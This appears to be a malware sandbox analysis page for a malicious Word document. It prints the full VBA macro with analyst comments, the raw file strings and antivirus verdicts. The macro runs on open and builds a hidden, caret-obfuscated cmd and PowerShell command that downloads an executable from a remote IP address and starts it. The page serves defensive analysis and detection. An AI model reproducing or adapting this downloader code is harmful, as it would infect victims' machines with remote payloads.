Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "tmpF572"
' kfekaxw: builds one command line out of 6-character string fragments and passes it
' to Shell with a hidden window. AutoOpen calls this routine, so it runs when the
' document is opened with macros enabled.
'
' Analyst notes, read from the literals below:
'  - The fragments are assigned in shuffled order; only the Array() order in the Shell
'    call gives the real text. Joined, they spell "CMD.exe /C" followed by a quoted
'    PowerShell invocation.
'  - The "^" characters are cmd.exe escape carets and the mixed case is cosmetic; both
'    only break up keywords so that plain string matching on the macro misses them.
'  - PowerShell arguments once the carets are dropped: execution policy bypass,
'    no profile, hidden window style, then System.Net.WebClient DownloadFile followed
'    by Start-Process on the downloaded file.
'  - Indicators (defanged): source hxxp://84.200.4[.]102/dwpc.exe ; local path
'    '%appdata%.exe', i.e. the APPDATA value with ".exe" appended.
'  - Detection points: Word spawning cmd.exe / powershell.exe, caret-laden command
'    lines, a plain-HTTP fetch from a bare IP address, a new executable named after
'    the APPDATA folder.
Sub kfekaxw()
' All fragment holders are untyped (Variant). foqywk and awwezx0 are assigned below but
' appear in neither Dim list, so they are implicitly declared (no Option Explicit is shown).
Dim oniwkexa, fujuxycg7, ikiwu, juvzoht0, qhegmero8, oklokq0, ofezr0, wobuhu0, mcuqpedzavs1, lyhwefzolf, ymybmefu9, hwuhtobe, ujictuqy, urudyglu, anenfy, fyphij1, qempepwo, gmeko, byhlipqyc, ujeh, yrpobakdi, rehgibm, zcizuhop9, zybape0, dgibekxef6, uzejyfd, opogd, afytlepd9, ehhigy, oqjofl, thybadxewc9, ykbiny, pgopikka9, yftixgad2, uqjezvi, wjehoqa, abdigmojp0, yhun, orcer, ejelne, blapkehick
Dim jhuvyjotg3, efowyvi, ichasqy9, sosuwcok4
qhegmero8 = "e /C """
wjehoqa = "^LOAD^"
' Gate for the Shell call: True when VarType(...) returns 8 (vbString).
' NOTE(review): the purpose is not stated on the page; possibly a host/environment check - confirm.
foqywk = VarType(ActiveDocument.Envelope.DefaultSize) = 8
oniwkexa = "-wIn^d"
blapkehick = "^Et.^W"
opogd = "p^RoCE"
pgopikka9 = "pPdaTA"
anenfy = "ss '%A"
afytlepd9 = "^.e^Xe"
wobuhu0 = "^en   "
uqjezvi = "rshelL"
uzejyfd = "   SY^"
fyphij1 = "e','%a"
efowyvi = "TaR^t-"
yhun = "^C^T  "
ujeh = "^('htt"
byhlipqyc = "  (N^e"
juvzoht0 = "wpc.ex"
hwuhtobe = "w-ObJE"
oqjofl = "CMD.ex"
abdigmojp0 = ").DoWn"
yrpobakdi = ")^;^S^"
ujictuqy = ".102/d"
yftixgad2 = "cutIO^"
ymybmefu9 = "^YP^aS"
ofezr0 = "^CY  b"
gmeko = "yL^e^ "
oklokq0 = "^no^Pr"
qempepwo = "Np^OLI"
dgibekxef6 = "O^W^st"
ichasqy9 = "pPdata"
fujuxycg7 = "%.exE'"
rehgibm = "p://84"
' A single double-quote character; it closes the quoted argument opened by qhegmero8.
thybadxewc9 = """"
ehhigy = "^IeNt^"
ykbiny = "^OF^il"
zybape0 = "f^i^LE"
sosuwcok4 = "STEm.N"
urudyglu = "%.eXE'"
' Window style handed to Shell: vbHide, so no console window is shown to the user.
orcer = vbHide
awwezx0 = "^EBC^L"
jhuvyjotg3 = "E     "
ikiwu = "s    -"
ejelne = " HId^D"
zcizuhop9 = ".200.4"
mcuqpedzavs1 = "p^ow^E"
lyhwefzolf = " -^ExE"


' Only runs when the VarType gate above evaluated to True.
If foqywk Then
' Join(..., "") concatenates the fragments with no separator; Shell starts the result hidden.
Shell Join(Array(oqjofl, qhegmero8, mcuqpedzavs1, uqjezvi, afytlepd9, lyhwefzolf, yftixgad2, qempepwo, ofezr0, ymybmefu9, ikiwu, oklokq0, ykbiny, jhuvyjotg3, oniwkexa, dgibekxef6, gmeko, ejelne, wobuhu0, byhlipqyc, hwuhtobe, yhun, uzejyfd, sosuwcok4, blapkehick, awwezx0, ehhigy, abdigmojp0, wjehoqa, zybape0, ujeh, rehgibm, zcizuhop9, ujictuqy, juvzoht0, fyphij1, pgopikka9, fujuxycg7, yrpobakdi, efowyvi, opogd, anenfy, ichasqy9, urudyglu, thybadxewc9), ""), orcer
End If
End Sub
' AutoOpen: Word runs a macro with this name automatically when the document is opened,
' provided macros are allowed. Here it does nothing except call kfekaxw, the routine
' that launches the hidden command line. Keeping macros disabled for documents from
' untrusted sources prevents this entry point from firing.
Sub AutoOpen()
kfekaxw
End Sub
        

                                    

Deobfuscated


                                        Attribute VB_Name = "tmpF572"
' kfekaxw as shown in the "Deobfuscated" view. The listing is the same as the
' "Original" one: the split-string obfuscation was not resolved by the tool, so the
' fragments still have to be joined by hand in the Array() order of the Shell call.
'
' What the joined fragments contain:
'  - "CMD.exe /C" followed by a quoted PowerShell command. "^" is the cmd.exe escape
'    caret and, like the mixed case, only serves to defeat plain string matching.
'  - PowerShell options: execution policy bypass, no profile, hidden window style.
'  - Payload logic: System.Net.WebClient DownloadFile, then Start-Process on the result.
'  - Indicators (defanged): hxxp://84.200.4[.]102/dwpc.exe written to and started from
'    '%appdata%.exe' (the APPDATA value with ".exe" appended).
'  - Useful telemetry: an Office process starting cmd.exe or powershell.exe, carets in
'    the command line, HTTP download from a bare IP, an executable created at that path.
Sub kfekaxw()
' Untyped (Variant) holders for the fragments. foqywk and awwezx0 are used below without
' being listed in either Dim statement, so they are implicitly declared.
Dim oniwkexa, fujuxycg7, ikiwu, juvzoht0, qhegmero8, oklokq0, ofezr0, wobuhu0, mcuqpedzavs1, lyhwefzolf, ymybmefu9, hwuhtobe, ujictuqy, urudyglu, anenfy, fyphij1, qempepwo, gmeko, byhlipqyc, ujeh, yrpobakdi, rehgibm, zcizuhop9, zybape0, dgibekxef6, uzejyfd, opogd, afytlepd9, ehhigy, oqjofl, thybadxewc9, ykbiny, pgopikka9, yftixgad2, uqjezvi, wjehoqa, abdigmojp0, yhun, orcer, ejelne, blapkehick
Dim jhuvyjotg3, efowyvi, ichasqy9, sosuwcok4
qhegmero8 = "e /C """
wjehoqa = "^LOAD^"
' Boolean gate: True when VarType of the envelope default size is 8 (vbString).
' NOTE(review): intent not documented on the page; may be an environment check - confirm.
foqywk = VarType(ActiveDocument.Envelope.DefaultSize) = 8
oniwkexa = "-wIn^d"
blapkehick = "^Et.^W"
opogd = "p^RoCE"
pgopikka9 = "pPdaTA"
anenfy = "ss '%A"
afytlepd9 = "^.e^Xe"
wobuhu0 = "^en   "
uqjezvi = "rshelL"
uzejyfd = "   SY^"
fyphij1 = "e','%a"
efowyvi = "TaR^t-"
yhun = "^C^T  "
ujeh = "^('htt"
byhlipqyc = "  (N^e"
juvzoht0 = "wpc.ex"
hwuhtobe = "w-ObJE"
oqjofl = "CMD.ex"
abdigmojp0 = ").DoWn"
yrpobakdi = ")^;^S^"
ujictuqy = ".102/d"
yftixgad2 = "cutIO^"
ymybmefu9 = "^YP^aS"
ofezr0 = "^CY  b"
gmeko = "yL^e^ "
oklokq0 = "^no^Pr"
qempepwo = "Np^OLI"
dgibekxef6 = "O^W^st"
ichasqy9 = "pPdata"
fujuxycg7 = "%.exE'"
rehgibm = "p://84"
' One literal double-quote; ends the quoted argument that qhegmero8 opens after /C.
thybadxewc9 = """"
ehhigy = "^IeNt^"
ykbiny = "^OF^il"
zybape0 = "f^i^LE"
sosuwcok4 = "STEm.N"
urudyglu = "%.eXE'"
' vbHide is the Shell window style: the spawned process gets no visible window.
orcer = vbHide
awwezx0 = "^EBC^L"
jhuvyjotg3 = "E     "
ikiwu = "s    -"
ejelne = " HId^D"
zcizuhop9 = ".200.4"
mcuqpedzavs1 = "p^ow^E"
lyhwefzolf = " -^ExE"


' The command is launched only if the gate computed above is True.
If foqywk Then
' Fragments are concatenated with an empty separator and handed to Shell with the hidden style.
Shell Join(Array(oqjofl, qhegmero8, mcuqpedzavs1, uqjezvi, afytlepd9, lyhwefzolf, yftixgad2, qempepwo, ofezr0, ymybmefu9, ikiwu, oklokq0, ykbiny, jhuvyjotg3, oniwkexa, dgibekxef6, gmeko, ejelne, wobuhu0, byhlipqyc, hwuhtobe, yhun, uzejyfd, sosuwcok4, blapkehick, awwezx0, ehhigy, abdigmojp0, wjehoqa, zybape0, ujeh, rehgibm, zcizuhop9, ujictuqy, juvzoht0, fyphij1, pgopikka9, fujuxycg7, yrpobakdi, efowyvi, opogd, anenfy, ichasqy9, urudyglu, thybadxewc9), ""), orcer
End If
End Sub
' AutoOpen is one of Word's automatic macro names: it is invoked on document open when
' macros are permitted. Its only statement calls kfekaxw, so opening the document is
' the trigger for the hidden Shell launch in that routine.
Sub AutoOpen()
kfekaxw
End Sub
        

                                    
bjbj,E,E
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
w toc'v
3Vq%'#q
:\TZaG
Qg20pp
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Windows User
Normal
Windows User
Microsoft Office Word
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Module1b
tmpF572
kfekaxw
oniwkexa
fujuxycg7
juvzoht0
qhegmero8
oklokq0
ofezr07
wobuhu0
mcuqpedzavs1[F
lyhwefzolfH.
ymybmefu9\Y
hwuhtobe
ujictuqy
urudyglu
anenfy+
fyphij1
qempepwo,v
byhlipqycA
yrpobakdi
rehgibm
zcizuhop9
zybape03?
dgibekxef6
uzejyfdY=
afytlepd9
ehhigy
oqjoflm
thybadxewc9z
ykbiny
pgopikka9?C
yftixgad2
uqjezvis
wjehoqa
abdigmojp0
ejelne
blapkehickN-
jhuvyjotg3
efowyvi
ichasqy9p
sosuwcok4
foqywka
VarType
ActiveDocument
Envelope
DefaultSize
vbHide
awwezx0
ShellV
JoinM&
AutoOpen
Documentj
.200.4'
p^ow^E'
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files
(x86)\Co
crosoft
Shared\O
FFICE14\
MSO.DLL#
P 14.0
LibrXary
hisDocum@entG
tmpF57P2G
e /C "'
^LOAD^'
-wIn^d'
^Et.^W'
p^RoCE'
pPdaTA'
ss '%A'
^.e^Xe'
^en '
rshelL'
SY^'
e','%a'
TaR^t-'
^C^T '
^('htt'
(N^e'
wpc.ex'
w-ObJE'
CMD.ex'
).DoWn'
)^;^S^'
.102/d'
cutIO^'
^YP^aS'
^CY b'
yL^e^ '
^no^Pr'
Np^OLI'
O^W^st'
pPdata'
%.exE''
p://84'
rt thi
^IeNt^'
^OF^il'
f^i^LE'
STEm.N'
%.eXE''
^EBC^L'
E '
s -'
HId^D'
.200.4'
p^ow^E'
-^ExE'
Attribut
e VB_Nam
e = "tmp
ub kfeka
m oniwke
xa, fuju
xycg7, i
kiwu, ju
vzoht0,
qhegmero
8, oklok
&ofezr
@wobuhu
cuqpedza
vs1, lyh
wefzolf,
ymybmef
u9, hwuh
tobe, uj@ictuqy
r udygl
Eqempe
byhlipqy$c,
obakdi,
rehgibm,
zcizuho
7zybape
zejyfd
afy tlepd
@oqjo@fl, th
Cwjeho
abdigm
8rcer, e
pkehick
jhuvyjot
ichasqy
sosuwcok
e /pC ""
^ LOAD^
Type(Act
iveDocum
ent.Enve
lope.Def
aultSizeb)
-wIn^d
^Et.^W
en 4
e',h'%a
(p'htt@
p (N^
).DhoWn
^8;^SA2
.1h02/
cputIO
CY b@
Np^OLI
%9`E'
OF^il
f^i^LA.
STEm.N
vbHide
awwezx0
yThen`
l Join(A
rray(%
oOpen!
ThisDocument
tmpF572
ID="{EA5F7498-1939-4F60-BEF2-14FFB3AB5367}"
Document=ThisDocument/&H00000000
Module=tmpF572
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="87857B498BD957DD57DD57DD57DD"
DPB="4F4DB381B3817A827A827A"
GC="1715EBD97B69426A426ABD"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0,P
tmpF572=52, 52, 1400, 707,
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal
Default Paragraph Font
Table Normal
No List
Project.tmpF572.kfekaxw
Project.tmpF572.AutoOpen
PROJECT.TMPF572.KFEKAXW
PROJECT.TMPF572.AUTOOPEN
Unknown
Times New Roman
Symbol
Calibri
Cambria Math
Windows User
Windows User
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
(1Normal.ThisDocument
*\G{000204EF-0tmpF572
_VBA_PROJECT
PROJECTwm
000-0000-C000-000000000046}#4.1#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.5#0#C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB#Microsoft Word 14.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.5#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL#Microsoft Office 14.0 Object Library
ThisDocument
0_5a202199
ThisDocument
tmpF572
0`5a202199
tmpF572
tThisDocument
2tmpF572
PROJECT
CompObj
Antivirus Signature
Bkav Clean
MicroWorld-eScan Trojan.GenericKD.4032157
FireEye VBA:Amphitryon.3374
CAT-QuickHeal Ole.Trojan-Downloader.A1386295
McAfee W97M/Downloader.bsd
Malwarebytes Clean
Zillya Clean
AegisLab Clean
Sangfor Malware.Generic-Macro.Save.9378bd11
K7AntiVirus Clean
K7GW Clean
Baidu VBA.Trojan-Downloader.Agent.bai
Cyren W97M/Agent.gen
Symantec W97M.Downloader
ESET-NOD32 VBA/TrojanDownloader.Agent.CEW
TrendMicro-HouseCall Trojan.W97M.POWLOAD.THABAAAH
Avast VBA:Downloader-DUW [Trj]
ClamAV Doc.Dropper.Downloader-6398265-0
Kaspersky Trojan-Downloader.MSWord.Agent.axd
BitDefender VBA:Amphitryon.3374
NANO-Antivirus Trojan.Script.vbPShell.ejvnov
ViRobot Clean
Tencent Heur.Msword.Gen.c
Ad-Aware Trojan.GenericKD.4032157
Sophos Troj/DocDl-GFB
Comodo Malware@#1rjt6798z25ka
F-Secure Clean
DrWeb Exploit.Siggen.17643
VIPRE Clean
TrendMicro Trojan.W97M.POWLOAD.THABAAAH
McAfee-GW-Edition BehavesLike.OLE2.Downloader.nx
CMC Clean
Emsisoft Trojan-Downloader.Macro (A)
SentinelOne Static AI - Malicious OLE
GData Trojan.GenericKD.4032157
Jiangmin Clean
Avira HEUR/Macro.Agent
MAX malware (ai score=100)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Trojan.U.Downloader.oa
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:O97M/Vigorf.A
Cynet Malicious (score: 99)
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Trojan.GenericKD.4032157
TACHYON Suspicious/W97M.Obfus.Gen.6
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Rising Downloader.Agent!8.B23 (TOPIS:E0:Z3yHNPAq86P)
Yandex Clean
Ikarus Trojan-Downloader.Script
MaxSecure Clean
Fortinet WM/Agent.CIJ!tr
AVG VBA:Downloader-DUW [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.